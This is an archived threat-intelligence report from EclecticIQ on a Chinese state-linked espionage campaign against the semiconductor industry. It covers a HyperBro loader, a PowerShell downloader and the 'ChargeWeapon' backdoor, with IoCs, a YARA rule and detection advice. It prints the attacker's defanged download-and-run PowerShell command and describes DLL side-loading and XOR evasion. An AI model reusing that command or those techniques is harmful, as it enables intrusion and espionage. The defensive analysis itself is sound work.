{
	"id": "30709abc-6e39-400d-be5b-4d2466b9a7da",
	"created_at": "2026-04-06T00:16:17.291482Z",
	"updated_at": "2026-04-10T03:36:06.799307Z",
	"deleted_at": null,
	"sha1_hash": "29b89bf0badf1497f496ad30ad9c25d67b5f650a",
	"title": "Chinese State-Sponsored Cyber Espionage Activity Targeting Semiconductor Industry in East Asia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1763067,
	"plain_text": "Chinese State-Sponsored Cyber Espionage Activity Targeting\r\nSemiconductor Industry in East Asia\r\nArchived: 2026-04-05 17:06:33 UTC\r\nExecutive Summary \r\nEclecticIQ analysts identified a cyber espionage campaign where threat actors used a variant of HyperBro loader with a\r\nTaiwan Semiconductor Manufacturing (TSMC) lure, likely to target the semiconductor industry in Mandarin/Chinese\r\nspeaking East Asian regions (Taiwan, Hong Kong, Singapore). Operational tactics, techniques, and procedures (TTPs)\r\noverlap with previously reported activities attributed to People's Republic of China (PRC) backed cyber espionage\r\ngroup. \r\nThe HyperBro loader variant leverages a digitally signed CyberArk binary for DLL-Side loading, resulting in in-memory execution of a Cobalt Strike beacon. [1] Pivoting the beacon, EclecticIQ analysts identified a previously\r\nundocumented malware downloader. This downloader utilizes the BitsTransfer module in PowerShell to fetch\r\nmalicious binaries from a very likely compromised Cobra DocGuard server.  \r\nThe malware downloader employs a DLL Side-Loading technique by using a signed McAfee binary, mcods.exe, to run\r\nthe Cobalt Strike shellcode. Analysts identified that the shellcode used the same Cobalt Strike C2 server associated\r\nwith the HyperBro loader variant. \r\nThe compromised Cobra DocGuard web server hosted a GO-based backdoor that EclecticIQ tracks as\r\n“ChargeWeapon”. The backdoor was very likely uploaded by the same threat actor on August 21, 2023 [2].\r\nChargeWeapon is designed to get remote access and send device and network information from an infected host to an\r\nattacker controlled C2 server.   
\r\nhttps://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\r\nPage 1 of 14\r\nFigure 1 - Graph view in EclecticIQ Intelligence Center.\r\nHyperBro Loader Utilizing DLL Side-Loading to Execute Cobalt Strike Beacon\r\nEclecticIQ analysts discovered that a threat actor used the variant of the HyperBro loader for in-memory execution of a Cobalt Strike beacon by leveraging a legitimate and digitally signed binary from CyberArk, vfhost.exe. Cobalt Strike is a commercial adversary simulation software that is marketed to Red Teams but is also stolen and actively used by a wide range of threat actors, from ransomware operators to espionage-focused Advanced Persistent Threats (APTs).\r\nFigure 2 - HyperBro loader executable masqueraded as ZIP file.\r\nDLL side-loading attacks use the DLL search order mechanism in Windows to plant and invoke a legitimate application that executes a malicious DLL payload. Threat actors commonly use this technique for persistence and defense evasion.\r\nAfter successful execution of the HyperBro loader variant (VFTRACE.dll), the DLL decrypts bin.config, which contains XOR-encrypted Cobalt Strike shellcode. The shellcode loads into vfhost.exe. Notably, malicious files were written into C:\\ProgramData, and VFTRACE.dll contains the PDB file path C:\\Users\\xdd\\Desktop\\今天\\0.直接装载\\VFTRACE\\Release\\VFTRACE.pdb.\r\nFigure 3 – DLL side-loading of HyperBro loader variant (VFTRACE.dll).\r\nThe shellcode decryption routine uses a one-byte key (0x01) to decrypt the XOR-encrypted Cobalt Strike payload. The same routine was used in older versions of the HyperBro loader [3]. This technique was used for evasion of signature-based malware detection.
The obfuscation is rather simple, yet the one-byte key leaves the payload with low entropy, which means a low detection rate against anti-malware scanners.\r\nFigure 4 – Disassembled HyperBro loader variant VFTRACE.dll and XOR decryption routine.\r\nEclecticIQ analysts extracted the command-and-control IP address 38[.]54[.]119[.]239 from the Cobalt Strike shellcode. Analysis showed that the threat actor used a Malleable command and control (Malleable C2) profile to disguise the beacon traffic as a jQuery CDN. A Malleable C2 profile specifies how the beacon will transform and store data in a transaction to its C2 server. This technique is used for evasion of traditional firewall defenses [4].\r\nFigure 5 – Extracted config file from Cobalt Strike shellcode.\r\nThe threat actor used a TSMC-themed PDF as a decoy, displayed after the execution of the HyperBro loader. The lure is written in traditional Mandarin, which is spoken in Hong Kong and Taiwan, possibly indicating an intention to target non-mainland Chinese speakers. This social engineering tactic is used to mislead the victim. By presenting a normal-looking PDF while covertly running malware in the background, the chances of the victim growing suspicious are minimized.\r\nFigure 6 – PDF document in Mandarin named “Taiwan Semiconductor Manufacturing”.\r\nCompromised Cobra DocGuard Web Server Abused for Second Stage Malware Delivery\r\nEclecticIQ analysts identified an undocumented malware downloader that was used by the threat actor to deploy Cobalt Strike shellcode.
After successful infection, it downloads the encrypted Cobalt Strike shellcode bin.config, the McAfee binary mcods.exe and a generic loader mcvsocfg.dll from a very likely compromised Cobra DocGuard web server at 154[.]93[.]7[.]99. Cobra DocGuard is software developed by a Chinese company called EsafeNet and used to protect, encrypt, and decrypt software or files. The downloaded binaries were used to decrypt and execute the Cobalt Strike shellcode via the DLL side-loading technique.\r\nThe Cobalt Strike beacon uses the same C2 address 38[.]54[.]119[.]239 that was detected in the HyperBro loader variant. Analysts assess with high confidence that the malware downloader was likely used by the same threat actor because it uses the same C2 server IP with the same Malleable C2 profile. In addition, the HyperBro loader variant and the malware downloader were uploaded to VirusTotal in August 2023, within 13 days of each other [5] [6].\r\nFigure 7 – Malware downloader uses the same C2 server seen in HyperBro loader.\r\nExcept for the downloading phase, this malware's kill chain is very similar to that of HyperBro. It differs in the routine used to decrypt the Cobalt Strike shellcode, and in how it loads the shellcode via undocumented Windows NTAPI functions to increase anti-malware evasion.
\r\nFigure 8 – Overlaps between HyperBro loader variant and new malware downloader.\r\nThe code snippet below shows the PowerShell command line executed after the successful infection of the Cobalt Strike downloader:\r\nStart-BitsTransfer -Source \"hxxp[://]154[.]93[.]7[.]99:8090/CDGServer3/images/zh/mcvsocfg[.]dll\" -Destination \"c:\\programdata\\mcvsocfg[.]dll\";Start-BitsTransfer -Source \"hxxp[://]154[.]93[.]7[.]99:8090/CDGServer3/images/zh/mcods[.]exe\" -Destination \"c:\\programdata\\mcods[.]exe\";Start-BitsTransfer -Source \"hxxp[://]154[.]93[.]7[.]99:8090/CDGServer3/images/zh/bin[.]config\" -Destination \"c:\\programdata\\bin[.]config\";start c:\\programdata\\mcods[.]exe\r\nThe PowerShell command was base64 encoded. It downloads the malware artifacts and drops them under c:\\programdata on the infected device. The threat actor used bin.config to store the encrypted Cobalt Strike shellcode. The other malware artifacts, mcods.exe and mcvsocfg.dll, were used to decrypt the Cobalt Strike shellcode and load it via the DLL side-loading technique.\r\nFigure 9 – Decryption routine of generic malware downloader using 16-byte XOR key.\r\nChargeWeapon – GO Language Based Backdoor\r\nEclecticIQ analysts identified a new GO-based backdoor that was uploaded on August 21, 2023, to the Cobra DocGuard web server 154[.]93[.]7[.]99, likely by the same threat actor. EclecticIQ analysts named the backdoor “ChargeWeapon” because of a string found in the malware code.\r\nThe file path C:/Users/xll is almost identical to the PDB path C:\\Users\\xdd\\ found in the HyperBro loader variant (see Figure 3).
EclecticIQ analysts assess with high confidence that the attacker's file path string D:/yuan/ was written into the GO binary during compilation.\r\nFigure 10 – ChargeWeapon string inside the GO-based malware.\r\nUpon infection, ChargeWeapon begins transmitting data about the compromised host. Transmitted data is sent in JSON format and obfuscated by base64 encoding. ChargeWeapon employs a POST request for command-and-control communication over 45[.]77[.]37[.]145:8443. A breakdown of the extracted data can be seen below:\r\nHostname\r\nIP address (IPv4 and IPv6 format)\r\nProcess tree\r\nThis information is very likely collected by the threat actor to perform initial reconnaissance against infected hosts and identify high-value targets.\r\nChargeWeapon uses the open-source obfuscation tool called \"garble\" to perform anti-malware evasion [7]. At the time of this report, only four anti-malware solutions have detected this malware variant in VirusTotal.\r\nChargeWeapon capabilities:\r\nInteraction with the remote device over the Windows default command line interface.\r\nWindows Management Instrumentation (WMI) execution.\r\nBase64 obfuscation during C2 connection.\r\nTCP over HTTP C2.\r\nReading or writing files on the infected host.\r\nThe disassembled version of ChargeWeapon shows the IP address of the C2 server and the base64 encoding function used when sending data to the attacker.\r\nFigure 11 – IP address of the C2 server used by ChargeWeapon.\r\nThe main function of ChargeWeapon is designed to send victim network and device data after execution.\r\nFigure 12 – IP address of the C2 server used by ChargeWeapon.
\r\nBelow is a list of GO libraries used by ChargeWeapon:\r\ngithub.com/shirou/gopsutil\r\ngithub.com/go-ole/\r\ngithub.com/yusufpapurcu/wmi\r\ngolang.org/x/sys\r\nMethods of Operation Strongly Overlap with People's Republic of China (PRC) Backed Nation-State Groups\r\nEclecticIQ analysts assess with high confidence that the analyzed HyperBro loader, the malware downloader and the GO backdoor are very likely operated and developed by a PRC-backed nation-state threat actor, due to victimology, infrastructure observed, malware code and resemblance with previously reported activity clusters.\r\nIn August 2023, Recorded Future reported on a Chinese state-sponsored group dubbed RedHotel [8]. EclecticIQ's research shares the following similarities with Recorded Future's analysis:\r\nThe PDB file paths found in the HyperBro variants are almost identical.\r\nUse of Cobalt Strike and a customized jQuery Malleable C2 profile.\r\nThe DLL side-loading technique via vfhost.exe.\r\nUse of hosting providers including AS-CHOOPA (Vultr) and Kaopu Cloud HK for C2 connections.\r\nIn October 2022, a report from Symantec stated that “Budworm has used the endpoint privilege management software CyberArk Viewfinity to perform side-loading. The binary, which has the default name vf_host.exe, is usually renamed by the attackers in order to masquerade as a more innocuous file. Masqueraded names included securityhealthservice.exe, secu.exe, vfhost.exe, vxhost.exe, vx.exe, and v.exe.” [9]\r\nAccording to researchers from Symantec, HyperBro is a malware strain seen in cyberattacks since 2018. It has been used by the APT27 (aka Budworm, LuckyMouse) threat actor to enable the group to gain full control over targeted systems.
The HyperBro malware family is often loaded using a technique known as dynamic-link library (DLL) side-loading.\r\nEclecticIQ observed the same DLL side-loading technique via the same CyberArk binary. However, in this new campaign EclecticIQ analysts have not observed any further overlap with APT27 other than the abuse of DLL side-loading through vfhost.exe.\r\nThe malware downloader found on the Cobra DocGuard server was uploaded to VirusTotal from Hong Kong. An August 22, 2023 report from Symantec stated that Cobra DocGuard was exploited in a supply chain attack targeting organizations in Hong Kong. It is attributed by Symantec to the APT group Carderbee [10].\r\nESET reported that in September 2022, a malicious update to the Cobra DocGuard software compromised a Hong Kong-based gambling company. The same company was targeted in September 2021 using a similar method by APT27. Due to this pattern, ESET believes that the September 2022 breach was also the work of APT27 [11].\r\nThe exploitation of Cobra DocGuard servers, and their use for malware delivery, overlaps with reports by Symantec and ESET. This provides further evidence for attribution to People's Republic of China (PRC) backed nation-state APT groups, which used similar infrastructure to target organizations in Hong Kong.\r\nDetection and Prevention Strategies\r\nMonitor for DLL side-loading activity under the C:\\ProgramData file path that uses binaries such as mcods.exe and vfhost.exe on Windows endpoints.\r\nUse application whitelisting to block execution of any unsigned executable (EXE) on Windows endpoints, and monitor suspicious download attempts that use the Start-BitsTransfer PowerShell cmdlet.\r\nThreat actors are increasingly leveraging Windows PowerShell cmdlets to conduct their operations. Consider blocking the usage of PowerShell for regular Windows users.
If that is not an option, EclecticIQ researchers highly recommend enabling PowerShell module and script logging via Windows Group Policy. Also, PowerShell Constrained Language Mode can be utilized to limit the attack surface available to adversaries.\r\nIn this campaign the threat actor consistently used the same VPS hosting providers, such as AS-CHOOPA (Vultr) and Kaopu Cloud HK, to perform their operations. Consider blocking or monitoring any download attempts from this infrastructure.\r\nIndicators of Compromise (IoC)\r\nHyperBro Loader\r\n12e1f50d7c9cf546c90545588bc369fa90e03f2370883e7befd87e4d50ebf0df\r\n7229bb62acc6feca55d05b82d2221be1ab0656431953012ebad7226adc63643b\r\ndf847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348 - (legitimate binary)\r\n45e7ce7b539bfb4f780c33faa1dff523463907ec793ff5d1e94204a8a6a00ab5\r\ndf6dd612643a778dca8879538753b693df04b9cf02169d04183136a848977ce9\r\nC2 IP:\r\nhttp://38[.]54[.]119[.]239:443/jquery-3.3.1.min.js\r\nChargeWeapon\r\n3195fe1a29d0d44c0eaec805a4769d506d03493816606f58ec49416d26ce5135\r\nC2 IP:\r\n45[.]77[.]37[.]145:8443\r\nGeneric Malware Downloader\r\nee66ebcbe872def8373a4e5ea23f14181ea04759ea83f01d2e8ff45d60c65e51\r\ne26f8b8091bbe5c62b73f73b6c9c24c2a2670719cf24ef8772b496815c6a6ce0 - (loader module)\r\ne6bad7f19d3e76268a09230a123bb47d6c7238b6e007cc45c6bc51bb993e8b46 - (legitimate binary)\r\nce226bd1f53819d6654caf04a7bb4141479f01f9225ac6fba49248920e57cb25\r\n56f94f1df0338d254d0421e7baf17527817607a60c6f9c71108e60a12d7d6dcf\r\nIP Address of second stage malware artifacts:\r\n45[.]32[.]33[.]17\r\n23[.]224[.]61[.]12\r\nhxxp[://]154[.]93[.]7[.]99:8090/CDGServer3/images/zh/mcvsocfg[.]dll\r\nhxxp[://]154[.]93[.]7[.]99:8090/CDGServer3/images/zh/mcods[.]exe\r\nhxxp[://]154[.]93[.]7[.]99:8090/CDGServer3/images/zh/bin[.]config\r\nAppendix A - MITRE 
ATT\u0026CK Techniques\r\nExploit Public-Facing Application - T1190\r\nObfuscated Files or Information - T1027\r\nIngress Tool Transfer - T1105\r\nApplication Layer Protocol: Web Protocols - T1071.001\r\nCommand and Scripting Interpreter: PowerShell - T1059.001\r\nUser Execution: Malicious File - T1204.002\r\nWindows Management Instrumentation - T1047\r\nGather Victim Host Information - T1592\r\nHijack Execution Flow: DLL Side-Loading - T1574.002\r\nMasquerading: Match Legitimate Name or Location - T1036.005\r\nDeobfuscate/Decode Files or Information - T1140\r\nAppendix B - Yara Rule for the Detection of ChargeWeapon:\r\nrule RedHotel_ChargeWeapon_Sep22\r\n{\r\n    meta:\r\n        description = \"Detects RedHotel ChargeWeapon Backdoor\"\r\n        author = \"EclecticIQ Threat Research Team\"\r\n        creation_date = \"22.09.2023\"\r\n        classification = \"TLP:WHITE\"\r\n        hash_md5 = \"44ee43adc8f423db4a461fc99731cdb9\"\r\n    strings:\r\n        // Go build ID string written by the Go linker\r\n        $GoBuildId = /Go build ID: \\\"[a-zA-Z0-9\\/_-]{40,120}\\\"/\r\n        // Source path fragments left in the binary: NUL byte followed by D:/yuan/go/ChargeWeapon/client.go\r\n        $YuanFilePath_1 = {00 44 3A 2F 79 75 61 6E 2F 67 6F 2F 43 68 61 72 67 65 57 65 61 70 6F 6E 2F 63 6C 69 65 6E 74 2E 67 6F}\r\n        // /go/ChargeWeapon/client.go\r\n        $YuanFilePath_2 = {2f 67 6f 2f 43 68 61 72 67 65 57 65 61 70 6f 6e 2f 63 6c 69 65 6e 74 2e 67 6f}\r\n        // C:/Users/xxl/go/\r\n        $YuanFilePath_3 = {43 3A 2F 55 73 65 72 73 2F 78 78 6C 2F 67 6F 2F}\r\n        // Go libraries imported by ChargeWeapon\r\n        $GoLibary1 = \"github.com/shirou/gopsutil\" ascii wide nocase\r\n        $GoLibary2 = \"github.com/go-ole/\" ascii wide nocase\r\n        $GoLibary3 = \"github.com/yusufpapurcu/wmi\" ascii wide nocase\r\n        $GoLibary4 = \"golang.org/x/sys\" ascii wide nocase\r\n    condition:\r\n        // PE (MZ) or ELF magic at offset 0\r\n        (uint16(0) == 0x5a4d or uint32(0) == 
0x7F454C46) and\r\n        // at least one of the hard-coded source paths\r\n        any of ($YuanFilePath_*) and\r\n        // exactly one Go build ID\r\n        #GoBuildId == 1 and\r\n        all of ($GoLibary*)\r\n}\r\nStructured Data\r\nFind this and other research in our public TAXII collection for easy use in your security stack: https://cti.eclecticiq.com/taxii/discovery. Please refer to our support page for guidance on how to access the feeds.\r\nAbout EclecticIQ Intelligence \u0026 Research Team\r\nEclecticIQ is a global provider of threat intelligence, hunting, and response technology and services. Headquartered in Amsterdam, the EclecticIQ Intelligence \u0026 Research Team is made up of experts from Europe and the U.S. with decades of experience in cyber security and intelligence in industry and government.\r\nWe would love to hear from you. Please send us your feedback by emailing us at research@eclecticiq.com.\r\nReferences\r\n[1] “Cobalt Strike (Malware Family).” Accessed: Sep. 22, 2023. [Online]. Available: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike\r\n[2] “VirusTotal - File - 3195fe1a29d0d44c0eaec805a4769d506d03493816606f58ec49416d26ce5135.” Accessed: Sep. 21, 2023. [Online]. Available: https://www.virustotal.com/gui/file/3195fe1a29d0d44c0eaec805a4769d506d03493816606f58ec49416d26ce5135/detection\r\n[3] “Examining APT27 and the HyperBro RAT,” RSA Link. Accessed: Sep. 21, 2023. [Online]. Available: https://community.netwitness.com/t5/netwitness-community-blog/examining-apt27-and-the-hyperbro-rat/ba-p/693490\r\n[4] C. N. 
Shibiraj Durgesh Sangvikar, Andrew Guan, Yu Fu, Yanhui Jia, Siddhart, “Cobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect,” Unit 42. Accessed: Sep. 21, 2023. [Online]. Available: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/\r\n[5] “VirusTotal - File - ee66ebcbe872def8373a4e5ea23f14181ea04759ea83f01d2e8ff45d60c65e51.” Accessed: Sep. 21, 2023. [Online]. Available: https://www.virustotal.com/gui/file/ee66ebcbe872def8373a4e5ea23f14181ea04759ea83f01d2e8ff45d60c65e51/relations\r\n[6] “VirusTotal - File - 12e1f50d7c9cf546c90545588bc369fa90e03f2370883e7befd87e4d50ebf0df.” Accessed: Sep. 21, 2023. [Online]. Available: https://www.virustotal.com/gui/file/12e1f50d7c9cf546c90545588bc369fa90e03f2370883e7befd87e4d50ebf0df/details\r\n[7] “garble.” burrowers, Sep. 21, 2023. Accessed: Sep. 21, 2023. [Online]. Available: https://github.com/burrowers/garble\r\n[8] “RedHotel A Prolific, Chinese State-Sponsored Grou.pdf.” Accessed: Sep. 21, 2023. [Online]. Available: https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf\r\n[9] “Budworm: Espionage Group Returns to Targeting U.S. Organizations.” Accessed: Sep. 21, 2023. [Online]. Available: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/budworm-espionage-us-state\r\n[10] “Carderbee: APT Group use Legit Software in Supply Chain Attack Targeting Orgs in Hong Kong | Symantec Enterprise Blogs.” Accessed: Sep. 22, 2023. [Online]. Available: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/carderbee-software-supply-chain-certificate-abuse\r\n[11] “eset_apt_activity_report_t32022.pdf.” Accessed: Sep. 21, 2023. [Online]. 
Available: https://web-assets.esetstatic.com/wls/2023/01/eset_apt_activity_report_t32022.pdf\r\nSource: https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia"
	],
	"report_names": [
		"chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6a0effeb-3ee2-4a67-9a9f-ef5c330b1c3a",
			"created_at": "2023-09-07T02:02:47.827633Z",
			"updated_at": "2026-04-10T02:00:04.873323Z",
			"deleted_at": null,
			"main_name": "RedHotel",
			"aliases": [
				"Operation FishMedley",
				"RedHotel",
				"TAG-22"
			],
			"source_name": "ETDA:RedHotel",
			"tools": [
				"Agentemis",
				"BIOPASS",
				"BIOPASS RAT",
				"BleDoor",
				"Brute Ratel",
				"Brute Ratel C4",
				"Cobalt Strike",
				"CobaltStrike",
				"FunnySwitch",
				"POISONPLUG.SHADOW",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"ShadowPad Winnti",
				"SprySOCKS",
				"Spyder",
				"Winnti",
				"XShellGhost",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c",
			"created_at": "2022-10-25T15:50:23.819113Z",
			"updated_at": "2026-04-10T02:00:05.354598Z",
			"deleted_at": null,
			"main_name": "Threat Group-3390",
			"aliases": [
				"Threat Group-3390",
				"Earth Smilodon",
				"TG-3390",
				"Emissary Panda",
				"BRONZE UNION",
				"APT27",
				"Iron Tiger",
				"LuckyMouse",
				"Linen Typhoon"
			],
			"source_name": "MITRE:Threat Group-3390",
			"tools": [
				"Systeminfo",
				"gsecdump",
				"PlugX",
				"ASPXSpy",
				"Cobalt Strike",
				"Mimikatz",
				"Impacket",
				"gh0st RAT",
				"certutil",
				"China Chopper",
				"HTTPBrowser",
				"Tasklist",
				"netstat",
				"SysUpdate",
				"HyperBro",
				"ZxShell",
				"RCSession",
				"ipconfig",
				"Clambling",
				"pwdump",
				"NBTscan",
				"Pandora",
				"Windows Credential Editor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e737c474-a1f2-4e18-9d78-1c00f0887fa0",
			"created_at": "2023-11-05T02:00:08.085728Z",
			"updated_at": "2026-04-10T02:00:03.401539Z",
			"deleted_at": null,
			"main_name": "Carderbee",
			"aliases": [],
			"source_name": "MISPGALAXY:Carderbee",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c63ab035-f9f2-4723-959b-97a7b98b5942",
			"created_at": "2023-01-06T13:46:38.298354Z",
			"updated_at": "2026-04-10T02:00:02.917311Z",
			"deleted_at": null,
			"main_name": "APT27",
			"aliases": [
				"BRONZE UNION",
				"Circle Typhoon",
				"Linen Typhoon",
				"TEMP.Hippo",
				"Budworm",
				"Lucky Mouse",
				"G0027",
				"GreedyTaotie",
				"Red Phoenix",
				"Iron Tiger",
				"Iron Taurus",
				"Earth Smilodon",
				"TG-3390",
				"EMISSARY PANDA",
				"Group 35",
				"ZipToken"
			],
			"source_name": "MISPGALAXY:APT27",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "17cfc7a6-c8f2-4806-b77f-ba23fb772e70",
			"created_at": "2023-09-07T02:02:47.182792Z",
			"updated_at": "2026-04-10T02:00:04.604605Z",
			"deleted_at": null,
			"main_name": "Carderbee",
			"aliases": [],
			"source_name": "ETDA:Carderbee",
			"tools": [
				"Agent.dhwf",
				"Cobra DocGuard",
				"Destroy RAT",
				"DestroyRAT",
				"Kaba",
				"Korplug",
				"PlugX",
				"RedDelta",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Xamtrav"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43",
			"created_at": "2025-08-07T02:03:24.68371Z",
			"updated_at": "2026-04-10T02:00:03.64323Z",
			"deleted_at": null,
			"main_name": "BRONZE UNION",
			"aliases": [
				"APT27 ",
				"Bowser",
				"Budworm ",
				"Circle Typhoon ",
				"Emissary Panda ",
				"Group35",
				"Iron Tiger ",
				"Linen Typhoon ",
				"Lucky Mouse ",
				"TG-3390 ",
				"Temp.Hippo "
			],
			"source_name": "Secureworks:BRONZE UNION",
			"tools": [
				"AbcShell",
				"China Chopper",
				"EAGERBEE",
				"Gh0st RAT",
				"OwaAuth",
				"PhantomNet",
				"PoisonIvy",
				"Sysupdate",
				"Wonknu",
				"Wrapikatz",
				"ZxShell",
				"reGeorg"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "5c13338b-eaed-429a-9437-f5015aa98276",
			"created_at": "2022-10-25T16:07:23.582715Z",
			"updated_at": "2026-04-10T02:00:04.675765Z",
			"deleted_at": null,
			"main_name": "Emissary Panda",
			"aliases": [
				"APT 27",
				"ATK 15",
				"Bronze Union",
				"Budworm",
				"Circle Typhoon",
				"Earth Smilodon",
				"Emissary Panda",
				"G0027",
				"Group 35",
				"Iron Taurus",
				"Iron Tiger",
				"Linen Typhoon",
				"LuckyMouse",
				"Operation DRBControl",
				"Operation Iron Tiger",
				"Operation PZChao",
				"Operation SpoiledLegacy",
				"Operation StealthyTrident",
				"Red Phoenix",
				"TEMP.Hippo",
				"TG-3390",
				"ZipToken"
			],
			"source_name": "ETDA:Emissary Panda",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agent.dhwf",
				"AngryRebel",
				"Antak",
				"CHINACHOPPER",
				"China Chopper",
				"Destroy RAT",
				"DestroyRAT",
				"FOCUSFJORD",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HTTPBrowser",
				"HTran",
				"HUC Packet Transmit Tool",
				"HighShell",
				"HttpBrowser RAT",
				"HttpDump",
				"HyperBro",
				"HyperSSL",
				"HyperShell",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"Nishang",
				"OwaAuth",
				"PCRat",
				"PlugX",
				"ProcDump",
				"PsExec",
				"RedDelta",
				"SEASHARPEE",
				"Sensocode",
				"SinoChopper",
				"Sogu",
				"SysUpdate",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Token Control",
				"TokenControl",
				"TwoFace",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Xamtrav",
				"ZXShell",
				"gsecdump",
				"luckyowa"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434577,
	"ts_updated_at": 1775792166,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/29b89bf0badf1497f496ad30ad9c25d67b5f650a.pdf",
		"text": "https://archive.orkl.eu/29b89bf0badf1497f496ad30ad9c25d67b5f650a.txt",
		"img": "https://archive.orkl.eu/29b89bf0badf1497f496ad30ad9c25d67b5f650a.jpg"
	}
}